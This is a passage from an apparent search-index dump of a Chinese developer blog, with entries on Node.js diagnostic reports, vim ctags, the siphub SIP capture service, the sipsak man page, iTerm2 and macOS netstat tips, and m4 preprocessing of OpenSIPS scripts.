环境变量 共享库 诊断报告的原始信息 如何产生诊断报告 必需使用 \u0026ndash;experimental-report 来启用 process.report.writeReport() 来输出诊断报告 node --experimental-report --diagnostic-report-filename=YYYYMMDD.HHMMSS.PID.SEQUENCE#.txt --eval \u0026#34;process.report.writeReport(\u0026#39;report.json\u0026#39;)\u0026#34; Writing Node.js report to file: report.json Node.js report completed 用编辑器打开诊断报告,可以看到类似下面的内容。\n如何从诊断报告中分析问题? 诊断报告很长,不太好理解。IBM开发了report-toolkit工具,可以用来分析。 要求:node \u0026gt; 11.8.0\nnpm install report-toolkit --global 或者 yarn global add report-toolkit 查看帮助信息\nrtk --help 自动出发报告 node --experimental-report \\ --diagnostic-report-on-fatalerror \\ --diagnostic-report-uncaught-exception \\ index.js $ node –help grep report --experimental-report enable report generation 启用report功能 --diagnostic-report-on-fatalerror generate diagnostic report on fatal (internal) errors 产生报告当发生致命错误 --diagnostic-report-on-signal generate diagnostic report upon receiving signals 产生报告当收到信号 --diagnostic-report-signal=... causes diagnostic report to be produced on provided signal. Unsupported in Windows. (default: SIGUSR2) --diagnostic-report-uncaught-exception generate diagnostic report on uncaught exceptions 产生报告当出现未捕获的异常 --diagnostic-report-directory=... define custom report pathname. (default: current working directory of Node.js process) --diagnostic-report-filename=... define custom report file name. (default: YYYYMMDD.HHMMSS.PID.SEQUENCE#.txt) 参考 https://nodejs.org/dist/latest-v12.x/docs/api/report.html https://ibm.github.io/report-toolkit/quick-start https://developer.ibm.com/technologies/node-js/articles/introducing-report-toolkit-for-nodejs-diagnostic-reports ","permalink":"https://wdd.js.org/fe/nodejs-report/","summary":"在v11.7.0中加入实验性功能,诊断报告。诊断报告的输出是一个json文件,包括以下信息。\n进程信息 操作系统信息 堆栈信息 内存资源使用 libuv状态 环境变量 共享库 诊断报告的原始信息 如何产生诊断报告 必需使用 \u0026ndash;experimental-report 来启用 process.report.writeReport() 来输出诊断报告 node --experimental-report --diagnostic-report-filename=YYYYMMDD.HHMMSS.PID.SEQUENCE#.txt --eval \u0026#34;process.report.writeReport(\u0026#39;report.json\u0026#39;)\u0026#34; Writing Node.js report to file: report.json Node.js report completed 用编辑器打开诊断报告,可以看到类似下面的内容。\n如何从诊断报告中分析问题? 诊断报告很长,不太好理解。IBM开发了report-toolkit工具,可以用来分析。 要求:node \u0026gt; 11.8.0\nnpm install report-toolkit --global 或者 yarn global add report-toolkit 查看帮助信息\nrtk --help 自动出发报告 node --experimental-report \\ --diagnostic-report-on-fatalerror \\ --diagnostic-report-uncaught-exception \\ index.js $ node –help grep report --experimental-report enable report generation 启用report功能 --diagnostic-report-on-fatalerror generate diagnostic report on fatal (internal) errors 产生报告当发生致命错误 --diagnostic-report-on-signal generate diagnostic report upon receiving signals 产生报告当收到信号 --diagnostic-report-signal=.","title":"Nodejs诊断报告"},{"content":"安装 # ubuntu or debian apt-get install ctags # centos yum install ctags # centos # macOSX brew install ctags 注意,如果在macOS 上输入ctags -R, 可能会有报错 /Library/Developer/CommandLineTools/usr/bin/ctags: illegal option -- R usage: ctags [-BFadtuwvx] [-f tagsfile] file ... 那么你可以输入which ctags: /usr/bin/ctags # 如果输出是这个,那么路径就是错的。正确的目录应该是/usr/local/bin/ctags 那么你可以在你的.zshrc或者其他配置文件中,增加一个alias alias ctags=\u0026#34;/usr/local/bin/ctags\u0026#34; 使用 进入到项目跟目录\nctags -R # 当前目录及其子目录生成ctags文件 进入vim vim main.c # :set tags=$PWD/tags #让vim读区当前文件下的ctags文件 # 在多个文件的场景下,最好用绝对路径设置tags文件的位置 # 否则有可能会报错neovim E433: No tags file 快捷键 Ctrl+] 跳转到标签定义的地方 Ctrl+o 跳到之前的地方 ctrl+t 回到跳转之前的标签处 :ptag some_key 打开新的面板预览some_key的定义 下一个定义处 上一个定义处 gd 当前函数内查找当前标识符的定义处 gD 当前文件查找标识符的第一次定义处 ","permalink":"https://wdd.js.org/posts/2020/08/ed6944/","summary":"安装 # ubuntu or debian apt-get install ctags # centos yum install ctags # centos # macOSX brew install ctags 注意,如果在macOS 上输入ctags -R, 可能会有报错 /Library/Developer/CommandLineTools/usr/bin/ctags: illegal option -- R usage: ctags [-BFadtuwvx] [-f tagsfile] file ... 那么你可以输入which ctags: /usr/bin/ctags # 如果输出是这个,那么路径就是错的。正确的目录应该是/usr/local/bin/ctags 那么你可以在你的.zshrc或者其他配置文件中,增加一个alias alias ctags=\u0026#34;/usr/local/bin/ctags\u0026#34; 使用 进入到项目跟目录\nctags -R # 当前目录及其子目录生成ctags文件 进入vim vim main.c # :set tags=$PWD/tags #让vim读区当前文件下的ctags文件 # 在多个文件的场景下,最好用绝对路径设置tags文件的位置 # 否则有可能会报错neovim E433: No tags file 快捷键 Ctrl+] 跳转到标签定义的地方 Ctrl+o 跳到之前的地方 ctrl+t 回到跳转之前的标签处 :ptag some_key 打开新的面板预览some_key的定义 下一个定义处 上一个定义处 gd 当前函数内查找当前标识符的定义处 gD 当前文件查找标识符的第一次定义处 ","title":"vim ctags安装及使用"},{"content":"o我写siphub的原因是homer太难用了!!经常查不到想查的数据,查询的速度也很慢。\n项目地址:https://github.com/wangduanduan/siphub\n架构 SIP服务器例如OpenSIPS或者FS可以通过hep协议将数据写到siphub, siphub将数据规整之后写入MySql, siphub同时也提供Web页面来查询和展示SIP消息。 功能介绍 sip-hub是一个专注sip信令的搜索以及时序图可视化展示的服务。\n相比于Homer, sip-hub做了大量的功能简化。同时也提供了一些个性化的查询,例如被叫后缀查询,仅域名查询等。\nsip-hub服务仅有3个页面\nsip消息搜索页面,用于按照主被叫、域名和时间范围搜索呼叫记录 时序图展示页面,用于展示SIP时序图和原始SIP消息 可以导入导出SIP消息 可以查找A-Leg 监控功能 大量简化搜索结果页面。siphub的搜索结果页面,每个callId相同的消息,只展示一条。 相关截图 搜索页面 siphub的搜索结果仅仅展示callId相同的最早的一条记录,这样就避免了像homer那种,看起来很多个消息,实际上都是属于一个INVITE的。 From字段和To字段都支持域名查询:@test.cc From字段也支持后缀查询,例如1234这种号码,可以只输入234就能查到,但是后缀要写完整,只查23是查不到的。 To字段仅仅支持精确查询 信令展示页面 点击对应的消息,详情也会自动跳转出来。 安装 首先需要安装MySql数据库,并在其中建立一个名为siphub的数据库 运行 dbHost 数据库地址 dbUser 数据库用户 dbName 数据库名 dataKeepDays 抓包保存天数 3000端口是web页面端口 9060是hep消息收取端口 docker run -d -p 3000:3000 -p 9060:9060/udp \\ --env NODE_ENV=production \\ --env dbHost=1.2.3.4 \\ --env dbUser=root \\ --env dbPwd=123456 \\ --env dbName=siphub \\ --env dataKeepDays=3 \\ --name siphub wangduanduan/siphub 集成 OpenSIPS集成 test witch OpenSIPS 2.4\n# add hep listen listen=hep_udp:your_ip:9061 loadmodule \u0026#34;proto_hep.so\u0026#34; # replace SIP_HUB_IP_PORT with siphub‘s ip:port modparam(\u0026#34;proto_hep\u0026#34;, \u0026#34;hep_id\u0026#34;,\u0026#34;[hep_dst] SIP_HUB_IP_PORT;transport=udp;version=3\u0026#34;) loadmodule \u0026#34;siptrace.so\u0026#34; modparam(\u0026#34;siptrace\u0026#34;, \u0026#34;trace_id\u0026#34;,\u0026#34;[tid]uri=hep:hep_dst\u0026#34;) # add ite in request route(); if(!is_method(\u0026#34;REGISTER\u0026#34;) \u0026amp;\u0026amp; !has_totag()){ sip_trace(\u0026#34;tid\u0026#34;, \u0026#34;d\u0026#34;, \u0026#34;sip\u0026#34;); } FreeSWITCH集成 fs version 版本要高于 1.6.8+\n编辑: sofia.conf.xml\n用真实的siphub ip:port替换SIP_HUB_IP_PORT\n\u0026lt;param name=\u0026#34;capture-server\u0026#34; value=\u0026#34;udp:SIP_HUB_IP_PORT\u0026#34;/\u0026gt; freeswitch@fsnode04\u0026gt; sofia global capture on +OK Global capture on freeswitch@fsnode04\u0026gt; sofia global capture off +OK Global capture off 注意:sip_profiles里面的也要设置为yes\nsip_profiles/internal.xml \u0026lt;param name=\u0026#34;sip-capture\u0026#34; value=\u0026#34;yes\u0026#34;/\u0026gt; sip_profiles/external-ipv6.xml \u0026lt;param name=\u0026#34;sip-capture\u0026#34; value=\u0026#34;yes\u0026#34;/\u0026gt; sip_profiles/external.xml \u0026lt;param name=\u0026#34;sip-capture\u0026#34; value=\u0026#34;yes\u0026#34;/\u0026gt; ","permalink":"https://wdd.js.org/opensips/tools/siphub/","summary":"o我写siphub的原因是homer太难用了!!经常查不到想查的数据,查询的速度也很慢。\n项目地址:https://github.com/wangduanduan/siphub\n架构 SIP服务器例如OpenSIPS或者FS可以通过hep协议将数据写到siphub, siphub将数据规整之后写入MySql, siphub同时也提供Web页面来查询和展示SIP消息。 功能介绍 sip-hub是一个专注sip信令的搜索以及时序图可视化展示的服务。\n相比于Homer, sip-hub做了大量的功能简化。同时也提供了一些个性化的查询,例如被叫后缀查询,仅域名查询等。\nsip-hub服务仅有3个页面\nsip消息搜索页面,用于按照主被叫、域名和时间范围搜索呼叫记录 时序图展示页面,用于展示SIP时序图和原始SIP消息 可以导入导出SIP消息 可以查找A-Leg 监控功能 大量简化搜索结果页面。siphub的搜索结果页面,每个callId相同的消息,只展示一条。 相关截图 搜索页面 siphub的搜索结果仅仅展示callId相同的最早的一条记录,这样就避免了像homer那种,看起来很多个消息,实际上都是属于一个INVITE的。 From字段和To字段都支持域名查询:@test.cc From字段也支持后缀查询,例如1234这种号码,可以只输入234就能查到,但是后缀要写完整,只查23是查不到的。 To字段仅仅支持精确查询 信令展示页面 点击对应的消息,详情也会自动跳转出来。 安装 首先需要安装MySql数据库,并在其中建立一个名为siphub的数据库 运行 dbHost 数据库地址 dbUser 数据库用户 dbName 数据库名 dataKeepDays 抓包保存天数 3000端口是web页面端口 9060是hep消息收取端口 docker run -d -p 3000:3000 -p 9060:9060/udp \\ --env NODE_ENV=production \\ --env dbHost=1.2.3.4 \\ --env dbUser=root \\ --env dbPwd=123456 \\ --env dbName=siphub \\ --env dataKeepDays=3 \\ --name siphub wangduanduan/siphub 集成 OpenSIPS集成 test witch OpenSIPS 2.","title":"siphub 轻量级实时SIP信令收包的服务"},{"content":"sipsak is a command line tool which can send simple requests to a SIP server. It can run additional tests on a SIP server which are usefull for admins and developers of SIP enviroments.\nhttps://github.com/nils-ohlmeier/sipsak\n安装 apt-get install sipsak 发送options sipsak -vv -p 192.168.2.63:5060 -s sip:8001@test.cc man SIPSAK(1) User Manuals SIPSAK(1) NAME sipsak - a utility for various tests on sip servers and user agents SYNOPSIS sipsak [-dFGhiILnNMRSTUVvwz] [-a PASSWORD ] [-b NUMBER ] [-c SIPURI ] [-C SIPURI ] [-D NUMBER ] [-e NUMBER ] [-E STRING ] [-f FILE ] [-g STRING ] [-H HOSTNAME ] [-j STRING ] [-J STRING ] [-l PORT ] [-m NUMBER ] [-o NUMBER ] [-p HOSTNAME ] [-P NUMBER ] [-q REGEXP ] [-r PORT ] [-t NUMBER ] [-u STRING ] [-W NUMBER ] [-x NUMBER ] -s SIPURI DESCRIPTION sipsak is a SIP stress and diagnostics utility. It sends SIP requests to the server within the sip-uri and examines received responses. It runs in one of the following modes: - default mode A SIP message is sent to destination in sip-uri and reply status is displayed. The request is either taken from filename or generated as a new OPTIONS message. - traceroute mode (-T) This mode is useful for learning request\u0026#39;s path. It operates similarly to IP-layer utility traceroute(8). - message mode (-M) Sends a short message (similar to SMS from the mobile phones) to a given target. With the option -B the content of the MESSAGE can be set. Useful might be the options -c and -O in this mode. - usrloc mode (-U) Stress mode for SIP registrar. sipsak keeps registering to a SIP server at high pace. Additionally the registrar can be stressed with the -I or the -M option. If -I and -M are omitted sipsak can be used to register any given contact (with the -C option) for an account at a registrar and to query the current bindings for an account at a registrar. - randtrash mode (-R) Parser torture mode. sipsak keeps sending randomly corrupted messages to torture a SIP server\u0026#39;s parser. - flood mode (-F) Stress mode for SIP servers. sipsak keeps sending requests to a SIP server at high pace. If libruli (http://www.nongnu.org/ruli/) or c-ares (http://daniel.haxx.se/projects/c-ares/) support is compiled into the sipsak binary, then first a SRV lookup for _sip._tcp.hostname is made. If that fails a SRV lookup for _sip._udp.hostname is made. And if this lookup fails a normal A lookup is made. If a port was given in the target URI the SRV lookup is omitted. Failover, load distribution and other transports are not supported yet. OPTIONS -a, --password PASSWORD With the given PASSWORD an authentication will be tryed on received \u0026#39;401 Unauthorized\u0026#39;. Authorization will be tryed on time. If this option is omitted an authorization with an empty password (\u0026#34;\u0026#34;) will be tryed. If the password is equal to - the password will be read from the standard input (e.g. the keyboard). This prevents other users on the same host from seeing the password the password in the process list. NOTE: the password still can be read from the memory if other users have access to it. -A, --timing prints only the timing values of the test run if verbosity is zero because no -v was given. If one or more -v were given this option will be ignored. -b, --apendix-begin NUMBER The starting number which is appended to the user name in the usrloc mode. This NUMBER is increased until it reaches the value given by the -e parameter. If omitted the starting number will be one. -B, --message-body STRING The given STRING will be used as the body for outgoing MESSAGE requests. -c, --from SIPURI The given SIPURI will be used in the From header if sipsak runs in the message mode (initiated with the -M option). This is helpful to present the receiver of a MESSAGE a meaningfull and usable address to where maybe even responses can be send. -C, --contact SIPURI This is the content of the Contact header in the usrloc mode. This allows to insert forwards like for mail. For example you can insert the uri of your first SIP account at a second account, thus all calls to the second account will be for‐ warded to the first account. As the argument to this option will not be enclosed in brackets you can give also multiple contacts in the raw format as comma separated list. The special words empty or none will result in no contact header in the REGISTER request and thus the server should answer with the current bindings for the account at the registrar. The special words * or star will result in Contact header containing just a star, e.g. to remove all bindings by using expires value 0 together with this Contact. -d, --ignore-redirects If this option is set all redirects will be ignored. By default without this option received redirects will be respected. This option is automatically activated in the randtrash mode and in the flood mode. -D, --timeout-factor NUMBER The SIP_T1 timer is getting multiplied with the given NUMBER. After receiving a provisional response for an INVITE request, or when a reliable transport like TCP or TLS is used sipsak waits for the resulting amount of time for a final response until it gives up. -e, --appendix-end NUMBER The ending number which is appended to the user name in the usrloc mode. This number is increased until it reaches this ending number. In the flood mode this is the maximum number of messages which will be send. If omitted the default value is 2^31 (2147483647) in the flood mode. -E, --transport STRING The value of STRING will be used as IP transport for sending and receiving requests and responses. This option over‐ writes any result from the URI evaluation and SRV lookup. Currently only \u0026#39;udp\u0026#39; and \u0026#39;tcp\u0026#39; are accepted as value for STRING. -f, --filename FILE The content of FILE will be read in in binary mode and will be used as replacement for the alternatively created sip mes‐ sage. This can used in the default mode to make other requests than OPTIONS requests (e.g. INVITE). By default missing carriage returns in front of line feeds will be inserted (use -L to de-activate this function). If the filename is equal to - the file is read from standard input, e.g. from the keyboard or a pipe. Please note that the manipulation functions (e.g. inserting Via header) are only tested with RFC conform requests. Additionally special strings within the file can be replaced with some local or given values (see -g and -G for details). -F, --flood-mode This options activates the flood mode. In this mode OPTIONS requests with increasing CSeq numbers are sent to the server. Replies are ignored -- source port 9 (discard) of localhost is advertised in topmost Via. -h, --help Prints out a simple usage help message. If the long option --help is available it will print out a help message with the available long options. -g, --replace-string STRING Activates the replacement of $replace$ within the request (usually read in from a file) with the STRING. Alternatively you can also specify a list of attribute and values. This list has to start and end with a non alpha-numeric character. The same character has to be used also as separator between the attribute and the value and between new further attribute value pairs. The string \u0026#34;$attribute$\u0026#34; will be replaced with the value string in the message. -G, --replace Activates the automatic replacement of the following variables in the request (usually read in from a file): $dsthost$ will be replaced by with the host or domainname which is given by the -s parameter. $srchost$ will be replaced by the hostname of the local machine. $port$ will be replaced by the local listening port of sipsak. $user$ will be replaced by the username which is given by the -s parameter. -H, --hostname HOSTNAME Overwrites the automatic detection of the hostname with the given parameter. Warning: use this with caution (preferable only if the automatic detection fails). -i, --no-via Deactivates the insertion of the Via line of the localhost. Warning: this probably disables the receiving of the responses from the server. -I, --invite-mode Activates the Invites cycles within the usrloc mode. It should be combined with -U. In this combination sipsak first registeres a user, and then simulates an invitation to this user. First an Invite is sent, this is replied with 200 OK and finally an ACK is sent. This option can also be used without -U , but you should be sure to NOT invite real UAs with this option. In the case of a missing -U the -l PORT is required because only if you made a -U run with a fixed local port before, a run with -I and the same fixed local port can be successful. Warning: sipsak is no real UA and invita‐ tions to real UAs can result in unexpected behaivior. -j, --headers STRING The string will be added as one or more additional headers to the request. The string \u0026#34;\\n\u0026#34; (note: two characters) will be replaced with CRLF and thus result in two separate headers. That way more then one header can be added. -J, --autohash STRING The string will be used as the H(A1) input to the digest authentication response calculation. Thus no password from the -a option is required if this option is provided. The given string is expected to be a hex string with the length of the used hash function. -k, --local-ip STRING The local ip address to be used -l, --local-port PORT The receiving UDP socket will use the local network port. Useful if a file is given by -f which contains a correct Via line. Check the -S option for details how sipsak sends and receives messages. -L, --no-crlf De-activates the insertion of carriage returns (\\r) before all line feeds (\\n) (which is not already proceeded by car‐ raige return) if the input is coming from a file ( -f ). Without this option also an empty line will be appended to the request if required. -m, --max-forwards NUMBER This sets the value of the Max-Forward header field. If omitted no Max-Forward field will be inserted. If omitted in the traceroute mode number will be 255. -M, --message-mode This activates the Messages cycles within the usrloc mode (known from sipsak versions pre 0.8.0 within the normal usrloc test). This option should be combined with -U so that a successful registration will be tested with a test message to the user and replied with 200 OK. But this option can also be used without the -U option. Warning: using without -U can cause unexpected behaivor. -n, --numeric Instead of the full qualified domain name in the Via line the IP of the local host will be used. This option is now on by default. -N, --nagios-code Use Nagios comliant return codes instead of the normal sipsak ones. This means sipsak will return 0 if everything was ok and 2 in case of any error (local or remote). -o, --sleep NUMBER sipsak will sleep for NUMBER ms before it starts the next cycle in the usrloc mode. This will slow down the whole test process to be more realistic. Each cycle will be still completed as fast as possible, but the whole test will be slowed down. -O, --disposition STRING The given STRING will be used as the content for the Content-Disposition header. Without this option there will be no Content-Disposition header in the request. -p, --outbound-proxy HOSTNAME[:PORT] the address of the hostname is the target where the request will be sent to (outgoing proxy). Use this if the destination host is different then the host part of the request uri. The hostname is resolved via DNS SRV if supported (see descrip‐ tion for SRV resolving) and no port is given. -P, --processes NUMBER Start NUMBER of processes in parallel to do the send and reply checking. Only makes sense if a higher number for -e is given in the usrloc, message or invite mode. -q, --search REGEXP match replies against REGEXP and return false if no match occurred. Useful for example to detect server name in Server header field. -r, --remote-port PORT Instead of the default sip port 5060 the PORT will be used. Alternatively the remote port can be given within the sip uri of the -s parameter. -R, --random-mode This activates the randtrash mode. In this mode OPTIONS requests will be send to server with increasing numbers of ran‐ domly crashed characters within this request. The position within the request and the replacing character are randomly chosen. Any other response than Bad request (4xx) will stop this mode. Also three unresponded sends will stop this mode. With the -t parameter the maximum of trashed characters can be given. -s, --sip-uri SIPURI This mandatory option sets the destination of the request. It depends on the mode if only the server name or also an user name is mandatory. Example for a full SIPURI : sip:test@foo.bar:123 See the note in the description part about SRV lookups for details how the hostname of this URI is converted into an IP and port. -S, --symmetric With this option sipsak will use only one port for sending and receiving messages. With this option the local port for sending will be the value from the -l option. In the default mode sipsak sends from a random port and listens on the given port from the -l option. Note: With this option sipsak will not be able to receive replies from servers with asym‐ metric signaling (and broken rport implementation) like the Cisco proxy. If you run sipsak as root and with raw socket support (check the output from the -V option) then this option is not required because in this case sipsak already uses only one port for sending and receiving messages. -t, --trash-chars NUMBER This parameter specifies the maximum of trashed characters in the randtrash mode. If omitted NUMBER will be set to the length of the request. -T, --traceroute-mode This activates the traceroute mode. This mode works like the well known traceroute(8) command expect that not the number of network hops are counted rather the number of server on the way to the destination user. Also the round trip time of each request is printed out, but due to a limitation within the sip protocol the identity (IP or name) can only deter‐ mined and printed out if the response from the server contains a warning header field. In this mode on each outgoing request the value of the Max-Forwards header field is increased, starting with one. The maximum of the Max-Forwards header will 255 if no other value is given by the -m parameter. Any other response than 483 or 1xx are treated as a final response and will terminate this mode. -u, --auth-username STRING Use the given STRING as username value for the authentication (different account and authentication username). -U, --usrloc-mode This activates the usrloc mode. Without the -I or the -M option, this only registers users at a registrar. With one of the above options the previous registered user will also be probed ether with a simulated call flow (invite, 200, ack) or with an instant message (message, 200). One password for all users accounts within the usrloc test can be given with the -a option. An user name is mandatory for this mode in the -s parameter. The number starting from the -b parameter to the -e parameter is appended the user name. If the -b and the -e parameter are omitted, only one runs with the given user‐ name, but without append number to the usernames is done. -v, --verbose This parameter increases the output verbosity. No -v means nearly no output except in traceroute and error messages. The maximum of three v\u0026#39;s prints out the content of all packets received and sent. -V, --version Prints out the name and version number of sipsak and the options which were compiled into the binary. -w, --extract-ip Activates the extraction of the IP or hostname from the Warning header field. -W, --nagios-warn NUMBER Return Nagios warn exit code (1) if the number of retransmissions before success was above the given number. -x, --expires NUMBER Sets the value of the Expires header to the given number. -z, --remove-bindings Activates the randomly removing of old bindings in the usrloc mode. How many per cent of the bindings will be removed, is determined by the USRLOC_REMOVE_PERCENT define within the code (set it before compilation). Multiple removing of bind‐ ings is possible, and cannot be prevented. -Z, --timer-t1 Sets the amount of milliseconds for the SIP timer T1. It determines the length of the gaps between two retransmissions of a request on a unreliable transport. Default value is 500 if not changed via the configure option --enable-timeout. RETURN VALUES The return value 0 means that a 200 was received. 1 means something else then 1xx or 2xx was received. 2 will be returned on local errors like non resolvable names or wrong options combination. 3 will be returned on remote errors like socket errors (e.g. icmp error), redirects without a contact header or simply no answer (timeout). If the -N option was given the return code will be 2 in case of any (local or remote) error. 1 in case there have been retrans‐ missions from sipsak to the server. And 0 if there was no error at all. CAUTION Use sipsak responsibly. Running it in any of the stress modes puts substantial burden on network and server under test. EXAMPLES sipsak -vv -s sip:nobody@foo.bar displays received replies. sipsak -T -s sip:nobody@foo.bar traces SIP path to nobody. sipsak -U -C sip:me@home -x 3600 -a password -s sip:myself@company inserts forwarding from work to home for one hour. sipsak -f bye.sip -g \u0026#39;!FTAG!345.af23!TTAG!1208.12!\u0026#39; -s sip:myproxy reads the file bye.sip, replaces $FTAG$ with 345.af23 and $TTAG$ with 1208.12 and finally send this message to myproxy LIMITATIONS / NOT IMPLEMENTED Many servers may decide NOT to include SIP \u0026#34;Warning\u0026#34; header fields. Unfortunately, this makes displaying IP addresses of SIP servers in traceroute mode impossible. IPv6 is not supported. Missing support for the Record-Route and Route header. BUGS sipsak is only tested against the SIP Express Router (ser) though their could be various bugs. Please feel free to mail them to the author. AUTHOR Nils Ohlmeier \u0026lt;nils at sipsak dot org\u0026gt; SEE ALSO traceroute(8) ","permalink":"https://wdd.js.org/opensips/tools/sipsak/","summary":"sipsak is a command line tool which can send simple requests to a SIP server. It can run additional tests on a SIP server which are usefull for admins and developers of SIP enviroments.\nhttps://github.com/nils-ohlmeier/sipsak\n安装 apt-get install sipsak 发送options sipsak -vv -p 192.168.2.63:5060 -s sip:8001@test.cc man SIPSAK(1) User Manuals SIPSAK(1) NAME sipsak - a utility for various tests on sip servers and user agents SYNOPSIS sipsak [-dFGhiILnNMRSTUVvwz] [-a PASSWORD ] [-b NUMBER ] [-c SIPURI ] [-C SIPURI ] [-D NUMBER ] [-e NUMBER ] [-E STRING ] [-f FILE ] [-g STRING ] [-H HOSTNAME ] [-j STRING ] [-J STRING ] [-l PORT ] [-m NUMBER ] [-o NUMBER ] [-p HOSTNAME ] [-P NUMBER ] [-q REGEXP ] [-r PORT ] [-t NUMBER ] [-u STRING ] [-W NUMBER ] [-x NUMBER ] -s SIPURI DESCRIPTION sipsak is a SIP stress and diagnostics utility.","title":"sipsak"},{"content":"以前有个iTerm2有个很贴心的功能,鼠标向下滚动时,相关命令的输出也会自动向下。\n但是不知道最近是升级系统还是升级iTerm2的原因,这个功能实现不了。😭😭😭😭😭😭😭\n例如用vim打开一个大文件,或者使用man去查看一个命令的介绍文档时。如果要想向下滚动命令的输出内容。只能按j或者按空格或者回车。然而按键虽然精确,却没有用触摸板滚动来的爽。\n为了让vim能够接受鼠标向下滚动功能,我也曾设置了 set mouse=a 这个设置虽然可以用触摸板来向下滚屏了,但是也出现了意想不到的问题。\n然后我就去研究iTerm2的配置,发现关于鼠标的配置中,有一个 Scroll wheel send arrow keys when in alternat screen mode , 把这个指设置为Yes。那么无论Vim, 还是man命令,都可以用触摸板去滚动屏幕了。\n","permalink":"https://wdd.js.org/posts/2020/07/gon16g/","summary":"以前有个iTerm2有个很贴心的功能,鼠标向下滚动时,相关命令的输出也会自动向下。\n但是不知道最近是升级系统还是升级iTerm2的原因,这个功能实现不了。😭😭😭😭😭😭😭\n例如用vim打开一个大文件,或者使用man去查看一个命令的介绍文档时。如果要想向下滚动命令的输出内容。只能按j或者按空格或者回车。然而按键虽然精确,却没有用触摸板滚动来的爽。\n为了让vim能够接受鼠标向下滚动功能,我也曾设置了 set mouse=a 这个设置虽然可以用触摸板来向下滚屏了,但是也出现了意想不到的问题。\n然后我就去研究iTerm2的配置,发现关于鼠标的配置中,有一个 Scroll wheel send arrow keys when in alternat screen mode , 把这个指设置为Yes。那么无论Vim, 还是man命令,都可以用触摸板去滚动屏幕了。","title":"iTerm2 使用触摸版向下滚动命令输出"},{"content":"Mac上的netstat和Linux上的有不少的不同之处。\n在Liunx上常使用\nLinux Mac netstat -nulp netstat -nva -p udp netsat -ntlp netsat -nva -p tcp 注意,在Mac上netstat的-n和linux上的含义相同\n","permalink":"https://wdd.js.org/posts/2020/07/hingbv/","summary":"Mac上的netstat和Linux上的有不少的不同之处。\n在Liunx上常使用\nLinux Mac netstat -nulp netstat -nva -p udp netsat -ntlp netsat -nva -p tcp 注意,在Mac上netstat的-n和linux上的含义相同","title":"mac上netstat命令"},{"content":"opensips在多实例时,会有一些数据同步策略的问题。\n~\n","permalink":"https://wdd.js.org/opensips/ch5/db-mode/","summary":"opensips在多实例时,会有一些数据同步策略的问题。\n~","title":"[todo] db_mode调优"},{"content":"相比于kamailo的脚本的预处理能力,opensips的脚本略显单薄。OpenSIPS官方也认识到了这一点,但是也并未准备如何提高这部分能力。因为OpenSIPS是想将预处理交给这方面的专家,也就是大名鼎鼎的m4(当然,你可能根本不知道m4是啥)。\n举例来说 我们看一下opensips自带脚本的中的一小块。 里面就有三个要配置的地方\n这个listen的地址: listen=udp:127.0.0.1:5060 数据库地址的配置:modparam(\u0026ldquo;usrloc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;dbdriver://username:password@dbhost/dbname\u0026rdquo;) 数据库地址的配置:modparam(\u0026ldquo;acc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;mysql://user:password@localhost/opensips\u0026rdquo;) auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME mpath=\u0026#34;/usr/local//lib/opensips/modules/\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;dbdriver://username:password@dbhost/dbname\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://user:password@localhost/opensips\u0026#34;) 随着脚本代码的增多,各种配置往往越来越多。真是脚本里,配置的地方远远不止三处!\n你开发了OpenSIPS的脚本,但是真正部署的服务的可能是其他人。那么其他拿到你的脚本的时候,他们怎么知道要改哪些地方呢,难道要搜索一下,所有出现#CUSTOMIZE ME的地方就是需要配置的? 难道他们每次部署一个服务,就要改一遍脚本的内容? 改错了谁负责?\n如果你不想被运维人员在背后骂娘,就不要把配置性的数据写死到脚本里!\n如果你不想在打游戏的时候被运维人员点电话问这个配置出错应该怎么解决,就不要把配置型数据写死到脚本里!\n** 那么,你就需要用到M4**\n什么是M4? M4是一种宏语言,如果你不清楚什么是宏,你就可以把M4想想成一种字符串替换的工具。\n如何安装M4? 大部分Linux上都已经默认安装了m4, 你可以用m4 --version检查一下m4是否已经存在。\nm4 --version Copyright © 2021 Free Software Foundation, Inc. GPLv3+ 许可证: GNU 通用公共许可证第三版或更高版本 \u0026lt;https://gnu.org/licenses/gpl.html\u0026gt;。 这是自由软件: 您可自由更改并重新分发它。 在法律所允许的范围内,不附带任何担保条款。 如果不存在的话,可以用对应常用的包管理工具来安装,例如\napt-get install m4 能否举个m4例子? hello-world.m4\ndefine(`hello_world\u0026#39;, `你好,世界\u0026#39;) 小王说: hello_world 然后执行: m4 hello-world.m4\n小王说: 你好,世界 效果就是 hello_world这个字符,被我们定义的字符串给替换了。\n为什么要做预处理? 我管理过的OpenSIPS脚本,最长的大概有1500行左右。刚开始接手的时候,我花了很长时间才理清脚本的功能。\n这个脚本的存在的问题是:\n大段的逻辑都集中在请求路由中,功能比较缠绕,很容易改动一个地方,导致不可预测的问题 配置性的变量和脚本融合在一起,脚本迁移时,要改动的地方比较多,容易出错 某些环境需要某些功能,某些环境有不需要某些功能,很难做到兼容,结果就导致脚本的版本太多,难以维护 处理的目标\n将比较大的请求路由,按照功能划分多个子路由,专注处理功能内部的事情,做到高内聚,低耦合。可以使用m4的include指令,将多个文件引入到一个文件中。其实OpenSIPS本身也有类似的指令,include_file,但是这个指令并不是会在运行前生成一个统一的目标文件,有时候出错,不好排查问题出现的代码行。另外Include的文件太多,也不好维护。 将配置性变量,定义成m4的宏,有m4负责统一的宏展开。配置文件可以单独拿出来,也可以由m4的命令行参数传入。 关于不同环境的差异化编译,可以使用m4的条件语句。例如当某个宏的定义时展开某个语句,或者某个宏的值等于某个值后,再include某个文件。这样就可以做到条件展开和条件引入。 ","permalink":"https://wdd.js.org/opensips/ch5/m4/","summary":"相比于kamailo的脚本的预处理能力,opensips的脚本略显单薄。OpenSIPS官方也认识到了这一点,但是也并未准备如何提高这部分能力。因为OpenSIPS是想将预处理交给这方面的专家,也就是大名鼎鼎的m4(当然,你可能根本不知道m4是啥)。\n举例来说 